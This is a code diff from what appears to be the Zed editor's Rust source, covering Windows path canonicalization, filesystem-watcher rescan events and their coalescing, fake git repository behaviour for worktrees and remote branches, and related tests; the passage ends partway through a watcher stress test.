@@ -1413,6 +1510,18 @@ async fn test_create_file_no_focused_with_multiple_worktrees(cx: &mut TestAppCon
#[gpui::test]
async fn test_path_distance_ordering(cx: &mut TestAppContext) {
let app_state = init_test(cx);
+
+ cx.update(|cx| {
+ let settings = *ProjectPanelSettings::get_global(cx);
+ ProjectPanelSettings::override_global(
+ ProjectPanelSettings {
+ hide_root: true,
+ ..settings
+ },
+ cx,
+ );
+ });
+
app_state
.fs
.as_fake()
@@ -1648,6 +1757,17 @@ async fn test_query_history(cx: &mut gpui::TestAppContext) {
async fn test_history_match_positions(cx: &mut gpui::TestAppContext) {
let app_state = init_test(cx);
+ cx.update(|cx| {
+ let settings = *ProjectPanelSettings::get_global(cx);
+ ProjectPanelSettings::override_global(
+ ProjectPanelSettings {
+ hide_root: true,
+ ..settings
+ },
+ cx,
+ );
+ });
+
app_state
.fs
.as_fake()
@@ -2148,6 +2268,17 @@ async fn test_toggle_panel_new_selections(cx: &mut gpui::TestAppContext) {
async fn test_search_preserves_history_items(cx: &mut gpui::TestAppContext) {
let app_state = init_test(cx);
+ cx.update(|cx| {
+ let settings = *ProjectPanelSettings::get_global(cx);
+ ProjectPanelSettings::override_global(
+ ProjectPanelSettings {
+ hide_root: true,
+ ..settings
+ },
+ cx,
+ );
+ });
+
app_state
.fs
.as_fake()
@@ -2253,6 +2384,17 @@ async fn test_search_preserves_history_items(cx: &mut gpui::TestAppContext) {
async fn test_search_sorts_history_items(cx: &mut gpui::TestAppContext) {
let app_state = init_test(cx);
+ cx.update(|cx| {
+ let settings = *ProjectPanelSettings::get_global(cx);
+ ProjectPanelSettings::override_global(
+ ProjectPanelSettings {
+ hide_root: true,
+ ..settings
+ },
+ cx,
+ );
+ });
+
app_state
.fs
.as_fake()
@@ -2736,6 +2878,17 @@ async fn test_selected_history_item_stays_selected_on_worktree_updated(cx: &mut
async fn test_history_items_vs_very_good_external_match(cx: &mut gpui::TestAppContext) {
let app_state = init_test(cx);
+ cx.update(|cx| {
+ let settings = *ProjectPanelSettings::get_global(cx);
+ ProjectPanelSettings::override_global(
+ ProjectPanelSettings {
+ hide_root: true,
+ ..settings
+ },
+ cx,
+ );
+ });
+
app_state
.fs
.as_fake()
@@ -2784,6 +2937,17 @@ async fn test_history_items_vs_very_good_external_match(cx: &mut gpui::TestAppCo
async fn test_nonexistent_history_items_not_shown(cx: &mut gpui::TestAppContext) {
let app_state = init_test(cx);
+ cx.update(|cx| {
+ let settings = *ProjectPanelSettings::get_global(cx);
+ ProjectPanelSettings::override_global(
+ ProjectPanelSettings {
+ hide_root: true,
+ ..settings
+ },
+ cx,
+ );
+ });
+
app_state
.fs
.as_fake()
@@ -3183,6 +3347,17 @@ async fn test_history_items_uniqueness_for_multiple_worktree_open_all_files(
async fn test_selected_match_stays_selected_after_matches_refreshed(cx: &mut gpui::TestAppContext) {
let app_state = init_test(cx);
+ cx.update(|cx| {
+ let settings = *ProjectPanelSettings::get_global(cx);
+ ProjectPanelSettings::override_global(
+ ProjectPanelSettings {
+ hide_root: true,
+ ..settings
+ },
+ cx,
+ );
+ });
+
app_state.fs.as_fake().insert_tree("/src", json!({})).await;
app_state
@@ -3709,7 +3884,7 @@ impl SearchEntries {
fn collect_search_matches(picker: &Picker<FileFinderDelegate>) -> SearchEntries {
let mut search_entries = SearchEntries::default();
for m in &picker.delegate.matches.matches {
- match &m {
+ match m {
Match::History {
path: history_path,
panel_match: path_match,
@@ -3734,6 +3909,7 @@ fn collect_search_matches(picker: &Picker<FileFinderDelegate>) -> SearchEntries
search_entries.search_matches.push(path_match.0.clone());
}
Match::CreateNew(_) => {}
+ Match::Channel { .. } => {}
}
}
search_entries
@@ -3768,6 +3944,7 @@ fn assert_match_at_position(
Match::History { path, .. } => path.absolute.file_name().and_then(|s| s.to_str()),
Match::Search(path_match) => path_match.0.path.file_name(),
Match::CreateNew(project_path) => project_path.path.file_name(),
+ Match::Channel { channel_name, .. } => Some(channel_name.as_str()),
}
.unwrap();
assert_eq!(match_file_name, expected_file_name);
@@ -3777,6 +3954,17 @@ fn assert_match_at_position(
async fn test_filename_precedence(cx: &mut TestAppContext) {
let app_state = init_test(cx);
+ cx.update(|cx| {
+ let settings = *ProjectPanelSettings::get_global(cx);
+ ProjectPanelSettings::override_global(
+ ProjectPanelSettings {
+ hide_root: true,
+ ..settings
+ },
+ cx,
+ );
+ });
+
app_state
.fs
.as_fake()
@@ -3821,6 +4009,18 @@ async fn test_filename_precedence(cx: &mut TestAppContext) {
#[gpui::test]
async fn test_paths_with_starting_slash(cx: &mut TestAppContext) {
let app_state = init_test(cx);
+
+ cx.update(|cx| {
+ let settings = *ProjectPanelSettings::get_global(cx);
+ ProjectPanelSettings::override_global(
+ ProjectPanelSettings {
+ hide_root: true,
+ ..settings
+ },
+ cx,
+ );
+ });
+
app_state
.fs
.as_fake()
@@ -48,6 +48,7 @@ cocoa = "0.26"
[target.'cfg(target_os = "windows")'.dependencies]
windows.workspace = true
+dunce.workspace = true
[target.'cfg(any(target_os = "linux", target_os = "freebsd"))'.dependencies]
ashpd.workspace = true
@@ -392,6 +392,8 @@ impl GitRepository for FakeGitRepository {
.map(|branch_name| {
let ref_name = if branch_name.starts_with("refs/") {
branch_name.into()
+ } else if branch_name.contains('/') {
+ format!("refs/remotes/{branch_name}").into()
} else {
format!("refs/heads/{branch_name}").into()
};
@@ -425,7 +427,7 @@ impl GitRepository for FakeGitRepository {
.unwrap_or_else(|| "refs/heads/main".to_string());
let main_worktree = Worktree {
path: work_dir,
- ref_name: branch_ref.into(),
+ ref_name: Some(branch_ref.into()),
sha: head_sha.into(),
};
let mut all = vec![main_worktree];
@@ -436,15 +438,14 @@ impl GitRepository for FakeGitRepository {
fn create_worktree(
&self,
- name: String,
- directory: PathBuf,
+ branch_name: String,
+ path: PathBuf,
from_commit: Option<String>,
) -> BoxFuture<'_, Result<()>> {
let fs = self.fs.clone();
let executor = self.executor.clone();
let dot_git_path = self.dot_git_path.clone();
async move {
- let path = directory.join(&name);
executor.simulate_random_delay().await;
// Check for simulated error before any side effects
fs.with_git_state(&dot_git_path, false, |state| {
@@ -459,18 +460,18 @@ impl GitRepository for FakeGitRepository {
fs.with_git_state(&dot_git_path, true, {
let path = path.clone();
move |state| {
- if state.branches.contains(&name) {
- bail!("a branch named '{}' already exists", name);
+ if state.branches.contains(&branch_name) {
+ bail!("a branch named '{}' already exists", branch_name);
}
- let ref_name = format!("refs/heads/{name}");
+ let ref_name = format!("refs/heads/{branch_name}");
let sha = from_commit.unwrap_or_else(|| "fake-sha".to_string());
state.refs.insert(ref_name.clone(), sha.clone());
state.worktrees.push(Worktree {
path,
- ref_name: ref_name.into(),
+ ref_name: Some(ref_name.into()),
sha: sha.into(),
});
- state.branches.insert(name);
+ state.branches.insert(branch_name);
Ok::<(), anyhow::Error>(())
}
})??;
@@ -569,6 +570,11 @@ impl GitRepository for FakeGitRepository {
_base_branch: Option<String>,
) -> BoxFuture<'_, Result<()>> {
self.with_state_async(true, move |state| {
+ if let Some((remote, _)) = name.split_once('/')
+ && !state.remotes.contains_key(remote)
+ {
+ state.remotes.insert(remote.to_owned(), "".to_owned());
+ }
state.branches.insert(name);
Ok(())
})
@@ -587,7 +593,7 @@ impl GitRepository for FakeGitRepository {
})
}
- fn delete_branch(&self, name: String) -> BoxFuture<'_, Result<()>> {
+ fn delete_branch(&self, _is_remote: bool, name: String) -> BoxFuture<'_, Result<()>> {
self.with_state_async(true, move |state| {
if !state.branches.remove(&name) {
bail!("no such branch: {name}");
@@ -790,7 +796,7 @@ impl GitRepository for FakeGitRepository {
}
fn diff(&self, _diff: git::repository::DiffType) -> BoxFuture<'_, Result<String>> {
- unimplemented!()
+ future::ready(Ok(String::new())).boxed()
}
fn diff_stat(
@@ -981,6 +987,11 @@ impl GitRepository for FakeGitRepository {
fn remove_remote(&self, name: String) -> BoxFuture<'_, Result<()>> {
self.with_state_async(true, move |state| {
+ state.branches.retain(|branch| {
+ branch
+ .split_once('/')
+ .is_none_or(|(remote, _)| remote != name)
+ });
state.remotes.remove(&name);
Ok(())
})
@@ -37,7 +37,7 @@ use is_executable::IsExecutable;
use rope::Rope;
use serde::{Deserialize, Serialize};
use smol::io::AsyncWriteExt;
-#[cfg(any(target_os = "windows", feature = "test-support"))]
+#[cfg(feature = "test-support")]
use std::path::Component;
use std::{
io::{self, Write},
@@ -60,6 +60,8 @@ use git::{
repository::{InitialGraphCommitData, RepoPath, repo_path},
status::{FileStatus, StatusCode, TrackedStatus, UnmergedStatus},
};
+#[cfg(feature = "test-support")]
+use util::normalize_path;
#[cfg(feature = "test-support")]
use smol::io::AsyncReadExt;
@@ -76,6 +78,7 @@ pub enum PathEventKind {
Removed,
Created,
Changed,
+ Rescan,
}
#[derive(Clone, PartialEq, Eq, PartialOrd, Ord, Debug)]
@@ -147,7 +150,7 @@ pub trait Fs: Send + Sync {
&self,
abs_dot_git: &Path,
system_git_binary_path: Option<&Path>,
- ) -> Option<Arc<dyn GitRepository>>;
+ ) -> Result<Arc<dyn GitRepository>>;
async fn git_init(&self, abs_work_directory: &Path, fallback_branch_name: String)
-> Result<()>;
async fn git_clone(&self, repo_url: &str, abs_work_directory: &Path) -> Result<()>;
@@ -431,82 +434,43 @@ impl RealFs {
#[cfg(target_os = "windows")]
fn canonicalize(path: &Path) -> Result<PathBuf> {
- let mut strip_prefix = None;
+ use std::ffi::OsString;
+ use std::os::windows::ffi::OsStringExt;
+ use windows::Win32::Storage::FileSystem::GetVolumePathNameW;
+ use windows::core::HSTRING;
- let mut new_path = PathBuf::new();
- for component in path.components() {
- match component {
- std::path::Component::Prefix(_) => {
- let component = component.as_os_str();
- let canonicalized = if component
- .to_str()
- .map(|e| e.ends_with("\\"))
- .unwrap_or(false)
- {
- std::fs::canonicalize(component)
- } else {
- let mut component = component.to_os_string();
- component.push("\\");
- std::fs::canonicalize(component)
- }?;
-
- let mut strip = PathBuf::new();
- for component in canonicalized.components() {
- match component {
- Component::Prefix(prefix_component) => {
- match prefix_component.kind() {
- std::path::Prefix::Verbatim(os_str) => {
- strip.push(os_str);
- }
- std::path::Prefix::VerbatimUNC(host, share) => {
- strip.push("\\\\");
- strip.push(host);
- strip.push(share);
- }
- std::path::Prefix::VerbatimDisk(disk) => {
- strip.push(format!("{}:", disk as char));
- }
- _ => strip.push(component),
- };
- }
- _ => strip.push(component),
- }
- }
- strip_prefix = Some(strip);
- new_path.push(component);
- }
- std::path::Component::RootDir => {
- new_path.push(component);
- }
- std::path::Component::CurDir => {
- if strip_prefix.is_none() {
- // unrooted path
- new_path.push(component);
- }
- }
- std::path::Component::ParentDir => {
- if strip_prefix.is_some() {
- // rooted path
- new_path.pop();
- } else {
- new_path.push(component);
- }
- }
- std::path::Component::Normal(_) => {
- if let Ok(link) = std::fs::read_link(new_path.join(component)) {
- let link = match &strip_prefix {
- Some(e) => link.strip_prefix(e).unwrap_or(&link),
- None => &link,
- };
- new_path.extend(link);
- } else {
- new_path.push(component);
- }
- }
- }
- }
+ // std::fs::canonicalize resolves mapped network paths to UNC paths, which can
+ // confuse some software. To mitigate this, we canonicalize the input, then rebase
+ // the result onto the input's original volume root if both paths are on the same
+ // volume. This keeps the same drive letter or mount point the caller used.
- Ok(new_path)
+ let abs_path = if path.is_relative() {
+ std::env::current_dir()?.join(path)
+ } else {
+ path.to_path_buf()
+ };
+
+ let path_hstring = HSTRING::from(abs_path.as_os_str());
+ let mut vol_buf = vec![0u16; abs_path.as_os_str().len() + 2];
+ unsafe { GetVolumePathNameW(&path_hstring, &mut vol_buf)? };
+ let volume_root = {
+ let len = vol_buf
+ .iter()
+ .position(|&c| c == 0)
+ .unwrap_or(vol_buf.len());
+ PathBuf::from(OsString::from_wide(&vol_buf[..len]))
+ };
+
+ let resolved_path = dunce::canonicalize(&abs_path)?;
+ let resolved_root = dunce::canonicalize(&volume_root)?;
+
+ if let Ok(relative) = resolved_path.strip_prefix(&resolved_root) {
+ let mut result = volume_root;
+ result.push(relative);
+ Ok(result)
+ } else {
+ Ok(resolved_path)
+ }
}
}
@@ -682,9 +646,12 @@ impl Fs for RealFs {
code == libc::ENOSYS
|| code == libc::ENOTSUP
|| code == libc::EOPNOTSUPP
+ || code == libc::EINVAL
}) =>
{
// For case when filesystem or kernel does not support atomic no-overwrite rename.
+ // EINVAL is returned by FUSE-based filesystems (e.g. NTFS via ntfs-3g)
+ // that don't support RENAME_NOREPLACE.
true
}
Err(error) => return Err(error.into()),
@@ -1149,8 +1116,8 @@ impl Fs for RealFs {
&self,
dotgit_path: &Path,
system_git_binary_path: Option<&Path>,
- ) -> Option<Arc<dyn GitRepository>> {
- Some(Arc::new(RealGitRepository::new(
+ ) -> Result<Arc<dyn GitRepository>> {
+ Ok(Arc::new(RealGitRepository::new(
dotgit_path,
self.bundled_git_binary_path.clone(),
system_git_binary_path.map(|path| path.to_path_buf()),
@@ -1776,6 +1743,10 @@ impl FakeFs {
self.state.lock().buffered_events.len()
}
+ pub fn clear_buffered_events(&self) {
+ self.state.lock().buffered_events.clear();
+ }
+
pub fn flush_events(&self, count: usize) {
self.state.lock().flush_events(count);
}
@@ -2866,9 +2837,7 @@ impl Fs for FakeFs {
&self,
abs_dot_git: &Path,
_system_git_binary: Option<&Path>,
- ) -> Option<Arc<dyn GitRepository>> {
- use util::ResultExt as _;
-
+ ) -> Result<Arc<dyn GitRepository>> {
self.with_git_state_and_paths(
abs_dot_git,
false,
@@ -2884,7 +2853,6 @@ impl Fs for FakeFs {
}) as _
},
)
- .log_err()
}
async fn git_init(
@@ -2919,10 +2887,6 @@ impl Fs for FakeFs {
}
}
-pub fn normalize_path(path: &Path) -> PathBuf {
- util::normalize_path(path)
-}
-
pub async fn copy_recursive<'a>(
fs: &'a dyn Fs,
source: &'a Path,
@@ -3,6 +3,7 @@ use parking_lot::Mutex;
use std::{
collections::{BTreeMap, HashMap},
ops::DerefMut,
+ path::Path,
sync::{Arc, OnceLock},
};
use util::{ResultExt, paths::SanitizedPath};
@@ -86,10 +87,12 @@ impl Watcher for FsWatcher {
#[cfg(target_os = "linux")]
let mode = notify::RecursiveMode::NonRecursive;
+ let registration_path = path.clone();
let registration_id = global({
- let path = path.clone();
+ let watch_path = path.clone();
+ let callback_path = path;
|g| {
- g.add(path, mode, move |event: ¬ify::Event| {
+ g.add(watch_path, mode, move |event: ¬ify::Event| {
log::trace!("watcher received event: {event:?}");
let kind = match event.kind {
EventKind::Create(_) => Some(PathEventKind::Created),
@@ -109,12 +112,27 @@ impl Watcher for FsWatcher {
})
.collect::<Vec<_>>();
+ let is_rescan_event = event.need_rescan();
+ if is_rescan_event {
+ log::warn!(
+ "filesystem watcher lost sync for {callback_path:?}; scheduling rescan"
+ );
+                        // Only the first event per path is kept below; this guarantees the rescan event wins.
+                        // Any existing pending events for this path are likewise removed once the lock is held below.
+ path_events.retain(|p| &p.path != callback_path.as_ref());
+ path_events.push(PathEvent {
+ path: callback_path.to_path_buf(),
+ kind: Some(PathEventKind::Rescan),
+ });
+ }
+
if !path_events.is_empty() {
path_events.sort();
let mut pending_paths = pending_paths.lock();
if pending_paths.is_empty() {
tx.try_send(()).ok();
}
+ coalesce_pending_rescans(&mut pending_paths, &mut path_events);
util::extend_sorted(
&mut *pending_paths,
path_events,
@@ -126,7 +144,9 @@ impl Watcher for FsWatcher {
}
})??;
- self.registrations.lock().insert(path, registration_id);
+ self.registrations
+ .lock()
+ .insert(registration_path, registration_id);
Ok(())
}
@@ -141,6 +161,56 @@ impl Watcher for FsWatcher {
}
}
+fn coalesce_pending_rescans(pending_paths: &mut Vec<PathEvent>, path_events: &mut Vec<PathEvent>) {
+ if !path_events
+ .iter()
+ .any(|event| event.kind == Some(PathEventKind::Rescan))
+ {
+ return;
+ }
+
+ let mut new_rescan_paths: Vec<std::path::PathBuf> = path_events
+ .iter()
+ .filter(|e| e.kind == Some(PathEventKind::Rescan))
+ .map(|e| e.path.clone())
+ .collect();
+ new_rescan_paths.sort_unstable();
+
+ let mut deduped_rescans: Vec<std::path::PathBuf> = Vec::with_capacity(new_rescan_paths.len());
+ for path in new_rescan_paths {
+ if deduped_rescans
+ .iter()
+ .any(|ancestor| path != *ancestor && path.starts_with(ancestor))
+ {
+ continue;
+ }
+ deduped_rescans.push(path);
+ }
+
+ deduped_rescans.retain(|new_path| {
+ !pending_paths
+ .iter()
+ .any(|pending| is_covered_rescan(pending.kind, new_path, &pending.path))
+ });
+
+ if !deduped_rescans.is_empty() {
+ pending_paths.retain(|pending| {
+ !deduped_rescans.iter().any(|rescan_path| {
+ pending.path == *rescan_path
+ || is_covered_rescan(pending.kind, &pending.path, rescan_path)
+ })
+ });
+ }
+
+ path_events.retain(|event| {
+ event.kind != Some(PathEventKind::Rescan) || deduped_rescans.contains(&event.path)
+ });
+}
+
+fn is_covered_rescan(kind: Option<PathEventKind>, path: &Path, ancestor: &Path) -> bool {
+ kind == Some(PathEventKind::Rescan) && path != ancestor && path.starts_with(ancestor)
+}
+
#[derive(Default, Debug, Copy, Clone, PartialEq, Eq, Hash)]
pub struct WatcherRegistrationId(u32);
@@ -238,6 +308,97 @@ impl GlobalWatcher {
static FS_WATCHER_INSTANCE: OnceLock<anyhow::Result<GlobalWatcher, notify::Error>> =
OnceLock::new();
+#[cfg(test)]
+mod tests {
+ use super::*;
+ use std::path::PathBuf;
+
+ fn rescan(path: &str) -> PathEvent {
+ PathEvent {
+ path: PathBuf::from(path),
+ kind: Some(PathEventKind::Rescan),
+ }
+ }
+
+ fn changed(path: &str) -> PathEvent {
+ PathEvent {
+ path: PathBuf::from(path),
+ kind: Some(PathEventKind::Changed),
+ }
+ }
+
+ struct TestCase {
+ name: &'static str,
+ pending_paths: Vec<PathEvent>,
+ path_events: Vec<PathEvent>,
+ expected_pending_paths: Vec<PathEvent>,
+ expected_path_events: Vec<PathEvent>,
+ }
+
+ #[test]
+ fn test_coalesce_pending_rescans() {
+ let test_cases = [
+ TestCase {
+ name: "coalesces descendant rescans under pending ancestor",
+ pending_paths: vec![rescan("/root")],
+ path_events: vec![rescan("/root/child"), rescan("/root/child/grandchild")],
+ expected_pending_paths: vec![rescan("/root")],
+ expected_path_events: vec![],
+ },
+ TestCase {
+ name: "new ancestor rescan replaces pending descendant rescans",
+ pending_paths: vec![
+ changed("/other"),
+ rescan("/root/child"),
+ rescan("/root/child/grandchild"),
+ ],
+ path_events: vec![rescan("/root")],
+ expected_pending_paths: vec![changed("/other")],
+ expected_path_events: vec![rescan("/root")],
+ },
+ TestCase {
+ name: "same path rescan replaces pending non-rescan event",
+ pending_paths: vec![changed("/root")],
+ path_events: vec![rescan("/root")],
+ expected_pending_paths: vec![],
+ expected_path_events: vec![rescan("/root")],
+ },
+ TestCase {
+ name: "unrelated rescans are preserved",
+ pending_paths: vec![rescan("/root-a")],
+ path_events: vec![rescan("/root-b")],
+ expected_pending_paths: vec![rescan("/root-a")],
+ expected_path_events: vec![rescan("/root-b")],
+ },
+ TestCase {
+ name: "batch ancestor rescan replaces descendant rescan",
+ pending_paths: vec![],
+ path_events: vec![rescan("/root/child"), rescan("/root")],
+ expected_pending_paths: vec![],
+ expected_path_events: vec![rescan("/root")],
+ },
+ ];
+
+ for test_case in test_cases {
+ let mut pending_paths = test_case.pending_paths;
+ let mut path_events = test_case.path_events;
+
+ coalesce_pending_rescans(&mut pending_paths, &mut path_events);
+
+ assert_eq!(
+ pending_paths, test_case.expected_pending_paths,
+ "pending_paths mismatch for case: {}",
+ test_case.name
+ );
+ assert_eq!(
+ path_events, test_case.expected_path_events,
+ "path_events mismatch for case: {}",
+ test_case.name
+ );
+ }
+ }
+}
+
fn handle_event(event: Result<notify::Event, notify::Error>) {
log::trace!("global handle event: {event:?}");
// Filter out access events, which could lead to a weird bug on Linux after upgrading notify
@@ -6,139 +6,111 @@ use util::path;
#[gpui::test]
async fn test_fake_worktree_lifecycle(cx: &mut TestAppContext) {
- let worktree_dir_settings = &["../worktrees", ".git/zed-worktrees", "my-worktrees/"];
-
- for worktree_dir_setting in worktree_dir_settings {
- let fs = FakeFs::new(cx.executor());
- fs.insert_tree("/project", json!({".git": {}, "file.txt": "content"}))
- .await;
- let repo = fs
- .open_repo(Path::new("/project/.git"), None)
- .expect("should open fake repo");
-
- // Initially only the main worktree exists
- let worktrees = repo.worktrees().await.unwrap();
- assert_eq!(worktrees.len(), 1);
- assert_eq!(worktrees[0].path, PathBuf::from("/project"));
-
- let expected_dir = git::repository::resolve_worktree_directory(
- Path::new("/project"),
- worktree_dir_setting,
- );
-
- // Create a worktree
- repo.create_worktree(
- "feature-branch".to_string(),
- expected_dir.clone(),
- Some("abc123".to_string()),
- )
+ let fs = FakeFs::new(cx.executor());
+ fs.insert_tree("/project", json!({".git": {}, "file.txt": "content"}))
+ .await;
+ let repo = fs
+ .open_repo(Path::new("/project/.git"), None)
+ .expect("should open fake repo");
+
+ // Initially only the main worktree exists
+ let worktrees = repo.worktrees().await.unwrap();
+ assert_eq!(worktrees.len(), 1);
+ assert_eq!(worktrees[0].path, PathBuf::from("/project"));
+
+ fs.create_dir("/my-worktrees".as_ref()).await.unwrap();
+ let worktrees_dir = Path::new("/my-worktrees");
+
+ // Create a worktree
+ let worktree_1_dir = worktrees_dir.join("feature-branch");
+ repo.create_worktree(
+ "feature-branch".to_string(),
+ worktree_1_dir.clone(),
+ Some("abc123".to_string()),
+ )
+ .await
+ .unwrap();
+
+ // List worktrees — should have main + one created
+ let worktrees = repo.worktrees().await.unwrap();
+ assert_eq!(worktrees.len(), 2);
+ assert_eq!(worktrees[0].path, PathBuf::from("/project"));
+ assert_eq!(worktrees[1].path, worktree_1_dir);
+ assert_eq!(
+ worktrees[1].ref_name,
+ Some("refs/heads/feature-branch".into())
+ );
+ assert_eq!(worktrees[1].sha.as_ref(), "abc123");
+
+ // Directory should exist in FakeFs after creation
+ assert!(fs.is_dir(&worktrees_dir.join("feature-branch")).await);
+
+ // Create a second worktree (without explicit commit)
+ let worktree_2_dir = worktrees_dir.join("bugfix-branch");
+ repo.create_worktree("bugfix-branch".to_string(), worktree_2_dir.clone(), None)
.await
.unwrap();
- // List worktrees — should have main + one created
- let worktrees = repo.worktrees().await.unwrap();
- assert_eq!(worktrees.len(), 2);
- assert_eq!(worktrees[0].path, PathBuf::from("/project"));
- assert_eq!(
- worktrees[1].path,
- expected_dir.join("feature-branch"),
- "failed for worktree_directory setting: {worktree_dir_setting:?}"
- );
- assert_eq!(worktrees[1].ref_name.as_ref(), "refs/heads/feature-branch");
- assert_eq!(worktrees[1].sha.as_ref(), "abc123");
-
- // Directory should exist in FakeFs after create
- assert!(
- fs.is_dir(&expected_dir.join("feature-branch")).await,
- "worktree directory should be created in FakeFs for setting {worktree_dir_setting:?}"
- );
-
- // Create a second worktree (without explicit commit)
- repo.create_worktree("bugfix-branch".to_string(), expected_dir.clone(), None)
- .await
- .unwrap();
-
- let worktrees = repo.worktrees().await.unwrap();
- assert_eq!(worktrees.len(), 3);
- assert!(
- fs.is_dir(&expected_dir.join("bugfix-branch")).await,
- "second worktree directory should be created in FakeFs for setting {worktree_dir_setting:?}"
- );
-
- // Rename the first worktree
- repo.rename_worktree(
- expected_dir.join("feature-branch"),
- expected_dir.join("renamed-branch"),
- )
+ let worktrees = repo.worktrees().await.unwrap();
+ assert_eq!(worktrees.len(), 3);
+ assert!(fs.is_dir(&worktree_2_dir).await);
+
+ // Rename the first worktree
+ repo.rename_worktree(worktree_1_dir, worktrees_dir.join("renamed-branch"))
.await
.unwrap();
- let worktrees = repo.worktrees().await.unwrap();
- assert_eq!(worktrees.len(), 3);
- assert!(
- worktrees
- .iter()
- .any(|w| w.path == expected_dir.join("renamed-branch")),
- "renamed worktree should exist at new path for setting {worktree_dir_setting:?}"
- );
- assert!(
- worktrees
- .iter()
- .all(|w| w.path != expected_dir.join("feature-branch")),
- "old path should no longer exist for setting {worktree_dir_setting:?}"
- );
-
- // Directory should be moved in FakeFs after rename
- assert!(
- !fs.is_dir(&expected_dir.join("feature-branch")).await,
- "old worktree directory should not exist after rename for setting {worktree_dir_setting:?}"
- );
- assert!(
- fs.is_dir(&expected_dir.join("renamed-branch")).await,
- "new worktree directory should exist after rename for setting {worktree_dir_setting:?}"
- );
-
- // Rename a nonexistent worktree should fail
- let result = repo
- .rename_worktree(PathBuf::from("/nonexistent"), PathBuf::from("/somewhere"))
- .await;
- assert!(result.is_err());
-
- // Remove a worktree
- repo.remove_worktree(expected_dir.join("renamed-branch"), false)
- .await
- .unwrap();
-
- let worktrees = repo.worktrees().await.unwrap();
- assert_eq!(worktrees.len(), 2);
- assert_eq!(worktrees[0].path, PathBuf::from("/project"));
- assert_eq!(worktrees[1].path, expected_dir.join("bugfix-branch"));
-
- // Directory should be removed from FakeFs after remove
- assert!(
- !fs.is_dir(&expected_dir.join("renamed-branch")).await,
- "worktree directory should be removed from FakeFs for setting {worktree_dir_setting:?}"
- );
-
- // Remove a nonexistent worktree should fail
- let result = repo
- .remove_worktree(PathBuf::from("/nonexistent"), false)
- .await;
- assert!(result.is_err());
-
- // Remove the last worktree
- repo.remove_worktree(expected_dir.join("bugfix-branch"), false)
- .await
- .unwrap();
-
- let worktrees = repo.worktrees().await.unwrap();
- assert_eq!(worktrees.len(), 1);
- assert_eq!(worktrees[0].path, PathBuf::from("/project"));
- assert!(
- !fs.is_dir(&expected_dir.join("bugfix-branch")).await,
- "last worktree directory should be removed from FakeFs for setting {worktree_dir_setting:?}"
- );
- }
+ let worktrees = repo.worktrees().await.unwrap();
+ assert_eq!(worktrees.len(), 3);
+ assert!(
+ worktrees
+ .iter()
+ .any(|w| w.path == worktrees_dir.join("renamed-branch")),
+ );
+ assert!(
+ worktrees
+ .iter()
+ .all(|w| w.path != worktrees_dir.join("feature-branch")),
+ );
+
+ // Directory should be moved in FakeFs after rename
+ assert!(!fs.is_dir(&worktrees_dir.join("feature-branch")).await);
+ assert!(fs.is_dir(&worktrees_dir.join("renamed-branch")).await);
+
+ // Renaming a nonexistent worktree should fail
+ let result = repo
+ .rename_worktree(PathBuf::from("/nonexistent"), PathBuf::from("/somewhere"))
+ .await;
+ assert!(result.is_err());
+
+ // Remove a worktree
+ repo.remove_worktree(worktrees_dir.join("renamed-branch"), false)
+ .await
+ .unwrap();
+
+ let worktrees = repo.worktrees().await.unwrap();
+ assert_eq!(worktrees.len(), 2);
+ assert_eq!(worktrees[0].path, PathBuf::from("/project"));
+ assert_eq!(worktrees[1].path, worktree_2_dir);
+
+ // Directory should be removed from FakeFs after removal
+ assert!(!fs.is_dir(&worktrees_dir.join("renamed-branch")).await);
+
+ // Removing a nonexistent worktree should fail
+ let result = repo
+ .remove_worktree(PathBuf::from("/nonexistent"), false)
+ .await;
+ assert!(result.is_err());
+
+ // Remove the last worktree
+ repo.remove_worktree(worktree_2_dir.clone(), false)
+ .await
+ .unwrap();
+
+ let worktrees = repo.worktrees().await.unwrap();
+ assert_eq!(worktrees.len(), 1);
+ assert_eq!(worktrees[0].path, PathBuf::from("/project"));
+ assert!(!fs.is_dir(&worktree_2_dir).await);
}
#[gpui::test]
@@ -1,10 +1,14 @@
use std::{
+ collections::BTreeSet,
io::Write,
path::{Path, PathBuf},
+ time::Duration,
};
+use futures::{FutureExt, StreamExt};
+
use fs::*;
-use gpui::BackgroundExecutor;
+use gpui::{BackgroundExecutor, TestAppContext};
use serde_json::json;
use tempfile::TempDir;
use util::path;
@@ -621,3 +625,90 @@ async fn test_realfs_symlink_loop_metadata(executor: BackgroundExecutor) {
assert!(!metadata.is_executable);
// don't care about len or mtime on symlinks?
}
+
+#[gpui::test]
+#[ignore = "stress test; run explicitly when needed"]
+async fn test_realfs_watch_stress_reports_missed_paths(
+ executor: BackgroundExecutor,
+ cx: &mut TestAppContext,
+) {
+ const FILE_COUNT: usize = 32000;
+ cx.executor().allow_parking();
+
+ let fs = RealFs::new(None, executor.clone());
+ let temp_dir = TempDir::new().expect("create temp dir");
+ let root = temp_dir.path();
+
+ let mut file_paths = Vec::with_capacity(FILE_COUNT);
+ let mut expected_paths = BTreeSet::new();
+
+ for index in 0..FILE_COUNT {
+ let dir_path = root.join(format!("dir-{index:04}"));
+ let file_path = dir_path.join("file.txt");
+ fs.create_dir(&dir_path).await.expect("create watched dir");
+ fs.write(&file_path, b"before")
+ .await
+ .expect("create initial file");
+ expected_paths.insert(file_path.clone());
+ file_paths.push(file_path);
+ }
+
+ let (mut events, watcher) = fs.watch(root, Duration::from_millis(10)).await;
+ let _watcher = watcher;
+
+ for file_path in &expected_paths {
+ _watcher
+ .add(file_path.parent().expect("file has parent"))
+ .expect("add explicit directory watch");
+ }
+
+ for (index, file_path) in file_paths.iter().enumerate() {
+ let content = format!("after-{index}");
+ fs.write(file_path, content.as_bytes())
+ .await
+ .expect("modify watched file");
+ }
+
+ let mut changed_paths = BTreeSet::new();
+ let mut rescan_count: u32 = 0;
+ let timeout = executor.timer(Duration::from_secs(10)).fuse();
+
+ futures::pin_mut!(timeout);
+
+ let mut ticks = 0;
+ while ticks < 1000 {
+ if let Some(batch) = events.next().fuse().now_or_never().flatten() {
+ for event in batch {
+ if event.kind == Some(PathEventKind::Rescan) {
+ rescan_count += 1;
+ }
+ if expected_paths.contains(&event.path) {
+ changed_paths.insert(event.path);
+ }
+ }
+ if changed_paths.len() == expected_paths.len() {
+ break;
+ }
+ ticks = 0;
+ } else {
+ ticks += 1;
+ executor.timer(Duration::from_millis(10)).await;
+ }
+ }
+
+ let missed_paths: BTreeSet<_> = expected_paths.difference(&changed_paths).cloned().collect();
+
+ eprintln!(
+ "realfs watch stress: expected={}, observed={}, missed={}, rescan={}",
+ expected_paths.len(),
+ changed_paths.len(),
+ missed_paths.len(),
